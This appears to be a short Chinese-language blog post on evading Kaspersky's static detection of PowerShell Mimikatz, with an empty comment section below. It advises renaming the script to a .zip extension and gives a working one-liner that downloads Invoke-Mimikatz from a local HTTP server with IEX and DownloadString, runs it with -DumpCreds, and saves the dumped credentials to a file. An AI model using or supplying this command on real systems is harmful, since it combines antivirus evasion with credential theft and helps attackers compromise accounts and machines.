powershell mimikatz如何繞過卡巴斯基靜態查殺

前提:不能訪問外網,本地有http服務器,需要把腳本放在本地http服務器目錄中

把後綴名改爲zip,默認情況卡巴不查殺

powershell "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:7001/oa/Invoke-Mimikatz.zip'); Invoke-Mimikatz -DumpCreds" >m.txt

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章